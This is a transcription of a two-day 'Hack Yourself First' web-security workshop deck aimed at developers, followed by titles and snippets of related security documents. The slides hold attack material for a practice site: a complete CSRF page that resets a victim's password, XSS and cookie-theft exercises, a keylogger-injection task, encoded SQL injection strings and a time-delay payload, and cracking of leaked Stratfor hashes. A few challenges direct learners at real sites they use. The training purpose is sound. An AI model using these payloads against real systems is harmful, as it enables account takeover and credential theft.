Hack Yourself First. Troy troyhunt.com
|
|
- Lilian Ford
- 8 years ago
- Views:
Transcription
1 Hack Yourself First Troy troyhunt.com
2 We re gonna turn you into lean, mean hacking machines!
3 Because if we don t, these kids are going to hack you Jake Davies, 19 (and his mum) Ryan Cleary, 20 (and his mum) Curtis Gervais, 16, awaiting trial (probably with his mum)
4 Who are we protecting our assets from? $10.8B per annum Hacker Resources Can invest where ROI makes sense Pocket money Hacker Competency Bored kids Common Thieves Super Hackers
5 Your Hacker Tools for Today A Wi-Fi connection A mobile device you can configure a proxy on I have a few spares Google Chrome Or another browser with good dev tools Fiddler getfiddler.com Or another HTTP proxy like charlesproxy.com
6 What we ll be covering on day 1 Introduction 30 mins 09:00 Discovering risks via the browser 30 mins 09:30 Using an HTTP proxy 30 mins 10:00 Break 15 mins 10:30 XSS 50 mins 10:45 SQL injection part 1 55 mins 11:35 Lunch 1 hour 12:30 Mobile APIs 60 mins 13:30 CSRF 50 mins 14:30 Break 15 mins 15:20 Framework disclosure 30 mins 15:35 Session hijacking 35 mins 16:05 Wrap up 20 mins 16:40 Close 17:00
7 What we ll be covering on day 2 Password cracking 50 mins 09:00 Account Enumeration 40 mins 10:00 Break 15 mins 10:30 FiddlerScript 50 mins 10:45 HTTPS 55 mins 11:35 Lunch 1 hour 12:30 Content Security Policy 60 mins 13:30 SQL injection part 2 50 mins 14:30 Break 15 mins 15:20 Brute force attacks 30 mins 15:35 Automating attacks and review 35 mins 16:05 Wrap up 20 mins 16:40 Close 17:00
8 Exercise 1 Discovering risks via the browser
9 Exercise 1 Chrome developer tools Familiarise yourself with the dev tools Elements, network, cookies, console, por uh, incognito Create an account at hackyourselffirst.troyhunt.com Hacker Challenge 1: Identify three security risks with the registration process
10 Exercise 2 Using an HTTP proxy
11 Exercise 2 Using an HTTP proxy Familiarise yourself with Fiddler Watch requests and their headers, review response body and headers, use the composer to reissue request Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID
12 Exercise 3 Reflected cross site scripting (XSS)
13 Understanding XSS mysite.com/?q=<script>alert('yay mysite.com/?q=ferrari XSS!');</script> <p>you searched for <%= Request.QueryString["q"] %></p> <p>you searched <p>you for <script>alert('yay searched for ferrari</p> XSS!');</script></p>
14 Some quick XSS tips Check the encoding context You encode for HTML differently than for JavaScript Check the encoding consistency Often it s manual and some characters are not encoded Play with JavaScript to: Manipulate the DOM, access cookies, load external resources
15 Exercise 3 XSS Establish the encoding practices on the search page What s encoded, what s not, what contexts are encoding What can be accessed or manipulated in the DOM Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
16 Exercise 3 solution ');document.location='
17 Exercise 4 SQL injection (SQLi) part 1
18 Understanding SQLi mysite.com/?id=foo mysite.com/?id=1 var query = "SELECT * FROM Widget WHERE Id = " query += Request.Query["id"] SELECT ** FROM Widget WHERE Id Id = = foo 1 Invalid column name 'foo'
19 Some quick SQLi tips Think of SQL commands which disclose structure sys.tables, sys.columns, system commands Consider how you d enumerate through records Select top x rows asc then top 1 rows from that desc Write out how you think the query works internally SELECT * FROM Supercar ORDER BY [URL param]
20 Exercise 4 SQLi Explore the database using error-based SQLi Construct strings to disclose internal data Cast things to invalid types to disclose via exceptions Hacker Challenge 4: Discover the version of the DB
21 Exercise 4 solution
22 Exercise 5 Mobile APIs
23 Understanding mobile APIs
24 Who are we protecting our APIs from? HTTP(S) Attacker Attacker
25 Trusting the Fiddler root cert
26 Some quick mobile API tips Look at the HTTP requests for sensitive data Credentials, account info, PII Remove the proxy s root cert and make HTTPS requests Is cert validation actually enabled in the app? In your own apps: Parameter tampering, auth bypass, direct object refs
27 Exercise 5 Mobile APIs Proxy your device through Fiddler or Charles Inspect the traffic of your apps Perform normal activities and monitor requests Hacker Challenge 5: Find three things of interest doesn t have to be security related
28 Exercise 6 Cross site request forgery (CSRF)
29 Understanding CSRF POST /Login/Account Set-Cookie: AuthCookie=XXX GET /Path/To/Authenticated/Resource Cookie: AuthCookie=XXX CSRF here! Authenticated request!
30 Some quick CSRF tips Establish the request pattern to the target resource What fields are being sent Reconstruct the request from your own resource Normally a malicious page Lure the user into the malicious resource Usually requires incentivisation
31 Exercise 6 CSRF Mount your own CSRF attack Reproduce a legitimate request Use it to perform a malicious action Hacker Challenge 6: Change the present user s password when they load your page
32 Exercise 6 solution
33 Exercise 6 solution <html> <head> <title>win an iphone!!!</title> </head> <body style="text-align: center;"> <h1 style="font-size: 1.7em;">Want to win an iphone? Of course you do! Click the button below and it's yours!!!</h1> <form action=" method="post" target="hiddenframe"> <input type="hidden" name="newpassword" value="hackpword" /> <input type="hidden" name="confirmpassword" value="hackpword" /> <input type="submit" value="i wanna win!" onclick="alert('you won! Click ok and it\'s done')" style="font-size: 2em;" /> </form> <p><img src="iphone.jpg" style="width: 900px;" /></p> <iframe name="hiddenframe" style="display: none;"></iframe> </body> </html>
34 Exercise 7 Framework disclosure
35 Understanding framework disclosure risks Learn of framework vulnerability Search web for vulnerable sites Pwn!
36 Some quick framework disclosure tips There are multiple ways the framework is leaked This can differ by web stack Different requests can cause different leakage Consider the different ways in which a site may responds Also think about other ways disclosure happens Markup structure, naming patterns, etc
37 Exercise 7 Framework disclosure Discover the internal framework of the site Identify what s being implicitly leaked Cause the app to leak additional information Hacker Challenge 7: Identify 3 different ways in which the internal framework is disclosed
38 Exercise 7 solution 1. Response headers (server, powered by, ASP.NET version, MVC version) 2. Unhandled exception stack trace (includes minor ASP.NET version) 3. Session ID cookie name (ASP.NET_SessionId) 4. Error page for 404 (includes minor ASP.NET version) 5. Database version via SQLi 6. ELMAH 7. HTTP fingerprinting
39 HTTP field ordering Apache HTTP/ OK Date: Sun, 15 Jun :10:49 GMT Server: Apache/ Last-Modified: Thu, 27 Feb 2003 ETag: "32417-c4-3e5d8a83" Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/html IIS 5.0 HTTP/ OK Server: Microsoft-IIS/5.0 Content-Location: Date: Fri, 01 Jan :13:52 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 ETag: W/"e0d362a4c335be1:ae1" Content-Length: 133
40 Other fingerprinting indicators Forbidden resource Improper HTTP version Improper protocol
41 Exercise 8 Session hijacking
42 Understanding session hijacking POST /Login/Account Set-Cookie: AuthCookie=XXX Attacker steals the cookie Attacker issues authenticated request with the cookie
43 Some quick session hijacking tips Persistence over HTTP can be done multiple ways Cookie, URL Session or auth ID can be obtained multiple ways Insecure transport, referrer, stored in exceptions, XSS Factors that limit hijacking Short duration expiry, keyed to client device / IP
44 Exercise 8 Session hijacking Mount a session hijacking attack Identify how auth is being persisted Obtain the auth token using a vuln in the app Hacker Challenge 8: Use an XSS risk to obtain the auth token and recreate the session in another browser
45 For tomorrow homework! Download hashcat Download the hashkiller dic Download the Stratfor hashes Download Python 2.7 for Windows Download sqlmap hashcat.net/hashcat tinyurl.com/hashkiller tinyurl.com/stratforhashes python.org/downloads sqlmap.org
46 What we ll be covering on day 2 Password cracking 50 mins 09:00 Account Enumeration 40 mins 10:00 Break 15 mins 10:30 FiddlerScript 50 mins 10:45 HTTPS 55 mins 11:35 Lunch 1 hour 12:30 Content Security Policy 60 mins 13:30 SQL injection part 2 50 mins 14:30 Break 15 mins 15:20 Brute force attacks 30 mins 15:35 Automating attacks and review 35 mins 16:05 Wrap up 20 mins 16:40 Close 17:00
47 Exercise 9 Password cracking
48 Understanding password hashing passw0rd Hashing algorithm Cipher Store and repeat process at login
49 Understanding password hashing with salt passw0rd + random salt Hashing algorithm Cipher Store cipher and salt Retrieve cipher and salt for username and repeat process at login
50 Understanding hash cracking This is not about breaking the algorithm You can t unhash It s about repeating the hash-creation process It s just a question of speed
51 Some quick hash cracking tips There are multiple ways to crack Character space: [a-za-z0-9] Dictionary: passw0rd, abc123, qwerty Mutations: manipulation and substitution of characters Cracking is all about time factor it s not absolute How long to crack how much
52 Exercise 9 Password cracking Cracking the Stratfor password hashes Identify the hashing algorithm Convert them to plain text Hacker Challenge 9: Use hashcat with the hashkiller dic to crack the Strafor hashes Hint: hashcat-cli64.exe --help
53 Exercise 10 Account enumeration
54 Understanding account enumeration Does have an account? No Does have an account? No Does have an account? Yes
55 Some quick account enumeration tips There are usually multiple vectors for identifying the existence of an account There may or may not be anti-automation defence And it may be inconsistent across vectors It may or may not even matter Very dependent on the nature
56 Exercise 10 Account enumeration Identify vectors for account enumeration Think about how to ask the site about an account Identify positive versus negative responses Hacker Challenge 10: Identify 3 sites you use that disclose the presence of your account
57 Exercise 11 FiddlerScript
58 Understanding FiddlerScript Highlight particular request / response patterns Modify requests or responses in transit Good representation of what can be done with intercepted traffic Also great for causing apps to misbehave!
59 Some quick FiddlerScript tips Make good use of the FiddlerScript CookBook Google it first result Wrap conditions around response parsing for better perf Host name / path / content type / method Don t forget to hit the Save Script button! Plus debugging can be painful
60 Exercise 11 FiddlerScript Identify vectors for account enumeration Identify request / response patterns of an app Manipulate request / response to cause misbehaviour Hacker Challenge 11: Proxy your mobile device and cause one of your apps to do something interesting
61 Exercise 12 HTTPS
62 Understanding HTTPS Confidentiality Integrity Authenticity
63 Some quick HTTPS tips Consider everything sent over HTTP to be compromised Sometimes that won t matter much Also look at HTTPS content embedded in untrusted pages Iframes Links to HTTPS
64 Exercise 12 HTTPS You can t trust insecure login forms! The form can be manipulated in transit Manipulate it to capture the secure credentials in transit Hacker Challenge 12: Inject a JavaScript keylogger into an insecure login page using Fiddler script
65 Injecting the keylogger hackyourselffirst.troyhunt.com/scripts/keylogger.js Set the destination JavaScript variable
66 Exercise 13 Content Security Policy (CSP)
67 Without a CSP Anything can be added to the page via a reflected XSS risk Anything can be added to the DOM downstream of the server and you have no idea when this one is happening!
68 With a CSP The browser will only load resources you white-list Local resources Remote resources Any violations can be reported If you re nervous, you always just report and not block
69 Some quick CSP tips Create a white list of what should be allowed to run Start with nothing and see what breaks In development! Use the report feature to track exceptions You ll learn some interesting things
70 Exercise 13 CSP American Express needs help! They have no CSP and they re a financial institution! We can add one ourselves in transit Hacker Challenge 13: Write a CSP for American Express and embed it using FiddlerScript
71 Injecting the CSP header if (osession.hostnameis(" { osession.oresponse.headers["content-security-policy"] = ; }
72 Exercise 14 SQL injection (SQLi) part 2
73 Understanding (more) SQLi Error Based Union Based Blind Boolean Blind Time
74 Understanding union based injection Error based worked due to improper handling of internal exceptions It was also laborious one request per piece of internal data exposed Union based injection appends the result of an injected query to a legitimate query
75 Understanding (more) SQLi Error Based Union Based Blind Boolean Blind Time
76 Understanding blind injection You can t always rely on data being explicitly returned to the UI Sometimes we need to ask questions of the system and draw conclusions from the answers
77 Understanding boolean blind injection These are effectively yes / no questions The answer causes the system to return results in a different way
78 Lowercase letter ASCII table a 97 b 98 c 99 d 100 e 101 f 102 g 103 h 104 i 105 j 106 k 107 l 108 m 109 n 110 o 111 p 112 q 113 r 114 s 115 t 116 u 117 v 118 w 119 x 120 y 121 z 122
79 Discovering letters via ASCII ranges yes <= m no <= s yes yes <= t yes yes u no <= v no = u no no v
80 Understanding (more) SQLi Error Based Union Based Blind Boolean Blind Time
81 Understanding time based blind injection It s still a yes / no question, but there s no output to determine the answer by In order to create an observable answer, we ll ask the database to delay the response: Yes : respond immediately No : wait for 2 seconds then respond
82 A condition with a time based result IF 'b' > 'a' WAITFOR DELAY '00:00:05'
83 Exercise 14 SQLi Establish which vectors exist for which SQLi styles The may be only one vulnerable point in the app It usually takes patience to discover! Hacker Challenge 14: Use union based injection to return all addresses and passwords
84 Exercise 15 Brute force attacks
85 Understanding brute force attacks Functions may be exploited if an attacker is given enough attempts at it Controls may exist to limit unsuccessful attempts but they can put usability at risk Sufficiently sophisticated attackers can circumvent many brute force defences
86 Some quick brute force attack tips Identify if any defences exists They re frequently missing Where defences exist, how are they implemented? Block the resource being requested Block the source IP address Rate limit (again, by resource or IP)
87 Exercise 15 Brute force attacks Test for protection against brute force attacks Consider resources that should provide a defence Assess behaviour when attack-live activity occurs Hacker Challenge 15: Identify a lack of brute force protection in a site you use Hint: Avoid banks & social
88 Exercise 16 Automating attacks and review
89 Understanding attack automation supercarid%27+and+%27x%27%3d%27x convert%28int%2cdb_name%28%29+collate+sql_latin1_general_cp12 54_CS_AS%29+and+1%3D1 convert%28int%2c%28char%2882%29%2bchar%2833%29%2b%28select+to p+1+cast%28count%28%5bname%5d%29+as+nvarchar%284000%29%29+fro m+%5bsysobjects%5d+where+xtype%3dchar%2885%29+%29%2bchar%2833 %29%2bchar%2882%29%29%29--
90 NetSparker PDF Report tinyurl.com/hackyourself-netsparker
91 Some quick attack automation tips Consider how targets can be identified Shodan, Googledorks, random crawling Think about the actions that adhere to a pattern SQL injection, fuzzing, directory enumeration Automation can be used for good! Use it to streamline your own security reviews
92 Exercise 16 Attack automation Mount an automated SQLi attack Use sqlmap to fast-track the attack Analyse various vulnerable pages Hacker Challenge 16: Extract the entire schema from the database Hint: sqlmap.py --help
Hack Yourself First. Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com
Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com We re gonna turn you into lean, mean hacking machines! Because if we don t, these kids are going to hack you Jake Davies, 19 (and
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationState of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford Computer Security Lab State of The Art: Automated Black Box Web Application Vulnerability Testing, Elie Bursztein, Divij Gupta, John Mitchell Background Web Application Vulnerability Protection
More informationApplication Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
More informationBASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS
BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS Published by Tony Porterfield Feb 1, 2015. Overview The intent of this test plan is to evaluate a baseline set of data security practices
More informationWeb Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
More informationHow to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationStill Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
More informationCyber Security Challenge Australia 2014
Cyber Security Challenge Australia 2014 www.cyberchallenge.com.au CySCA2014 Web Penetration Testing Writeup Background: Pentest the web server that is hosted in the environment at www.fortcerts.cysca Web
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationCyber Security Workshop Ethical Web Hacking
Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp
More informationA Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationLecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
More informationEthical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. info@rd1.net 2 Background Founder of Durkee Consulting since 1996
More informationABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
More informationCriteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationWeb Application Security Considerations
Web Application Security Considerations Eric Peele, Kevin Gainey International Field Directors & Technology Conference 2006 May 21 24, 2006 RTI International is a trade name of Research Triangle Institute
More informationWeb applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
More information(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
More informationWeb Application Attacks And WAF Evasion
Web Application Attacks And WAF Evasion Ahmed ALaa (EG-CERT) 19 March 2013 What Are We Going To Talk About? - introduction to web attacks - OWASP organization - OWASP frameworks - Crawling & info. gathering
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationEssential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
More informationCSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationWeb Application Firewall on SonicWALL SRA
Web Application Firewall on SonicWALL SRA Document Scope This document describes how to configure and use the Web Application Firewall feature in SonicWALL SRA 6.0. This document contains the following
More informationEC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
More informationHack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
More informationWeb Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
More informationWeb Application Attacks and Countermeasures: Case Studies from Financial Systems
Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications
More informationChapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
More informationASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
More informationProject 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
More informationArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationSecure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification
Secure Web Development Teaching Modules 1 Security Testing Contents 1 Concepts... 1 1.1 Security Practices for Software Verification... 1 1.2 Software Security Testing... 2 2 Labs Objectives... 2 3 Lab
More informationSecurity features of ZK Framework
1 Security features of ZK Framework This document provides a brief overview of security concerns related to JavaScript powered enterprise web application in general and how ZK built-in features secures
More informationEnterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
More informationMavituna Security Ltd. Finance House, 522A Uxbridge Rd. Pinner. HA5 3PU / UK +44 845 686 3001 +44 845 686 5001
Netsparker is the first false-positive free scanner. In this document you can see the details of features, how to use them and how to tweak Netsparker. If you can t find what you are looking for, please
More informationIntroduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
More informationDetecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationWeb Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel William.Bechtel@att.com
More informationWeb Application Security. Srikumar Venugopal S2, Week 8, 2013
Web Application Security Srikumar Venugopal S2, Week 8, 2013 Before we start Acknowledgements This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc.
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More informationWeb Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
More informationAPPLICATION SECURITY AND ITS IMPORTANCE
Table of Contents APPLICATION SECURITY AND ITS IMPORTANCE 1 ISSUES AND FIXES: 2 ISSUE: XSS VULNERABILITIES 2 ISSUE: CSRF VULNERABILITY 2 ISSUE: CROSS FRAME SCRIPTING (XSF)/CLICK JACKING 2 ISSUE: WEAK CACHE
More informationCross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
More informationWith so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up.
1 2 Why do we care about web application security? With so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up. We constantly
More informationConducting Web Application Pentests. From Scoping to Report For Education Purposes Only
Conducting Web Application Pentests From Scoping to Report For Education Purposes Only Web App Pen Tests According to OWASP: A Web Application Penetration Test focuses only on evaluating the security of
More informationNuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
More informationWeb Tracking for You. Gregory Fleischer
Web Tracking for You Gregory Fleischer 1 INTRODUCTION 2 Me Gregory Fleischer Senior Security Consultant at FishNet Security 3 Disclaimer Why do you hate? 4 Reasons For Tracking TradiFonal reasons for tracking
More informationJava Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
More informationUsing Foundstone CookieDigger to Analyze Web Session Management
Using Foundstone CookieDigger to Analyze Web Session Management Foundstone Professional Services May 2005 Web Session Management Managing web sessions has become a critical component of secure coding techniques.
More informationHow to hack a website with Metasploit
How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationOffensive Security. Advanced Web Attacks and Exploitation. Mati Aharoni Devon Kearns. v. 1.0
Offensive Security Advanced Web Attacks and Exploitation v. 1.0 Mati Aharoni Devon Kearns Course Overview The days of porous network perimeters are fading fast as services become more resilient and harder
More informationWeb Security Threat Report: January April 2007. Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots
Web Security Threat Report: January April 2007 Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots What are we reporting? We are presenting real, live web attack data captured in-the-wild.
More informationClient Side Filter Enhancement using Web Proxy
Client Side Filter Enhancement using Web Proxy Santosh Kumar Singh 1, Rahul Shrivastava 2 1 M Tech Scholar, Computer Technology (CSE) RCET, Bhilai (CG) India, 2 Assistant Professor, CSE Department, RCET
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationWeb Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationRevisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist
Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist Overview Background What it is? How are we doing? Web 2.0 SQL injection meets AJAX Fuggle SQL Injection meets Google
More informationSecure Web Development Teaching Modules 1. Threat Assessment
Secure Web Development Teaching Modules 1 Threat Assessment Contents 1 Concepts... 1 1.1 Software Assurance Maturity Model... 1 1.2 Security practices for construction... 3 1.3 Web application security
More informationExternal Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
More informationHTTP. Internet Engineering. Fall 2015. Bahador Bakhshi CE & IT Department, Amirkabir University of Technology
HTTP Internet Engineering Fall 2015 Bahador Bakhshi CE & IT Department, Amirkabir University of Technology Questions Q1) How do web server and client browser talk to each other? Q1.1) What is the common
More informationThreat Modeling/ Security Testing. Tarun Banga, Adobe 1. Agenda
Threat Modeling/ Security Testing Presented by: Tarun Banga Sr. Manager Quality Engineering, Adobe Quality Leader (India) Adobe Systems India Pvt. Ltd. Agenda Security Principles Why Security Testing Security
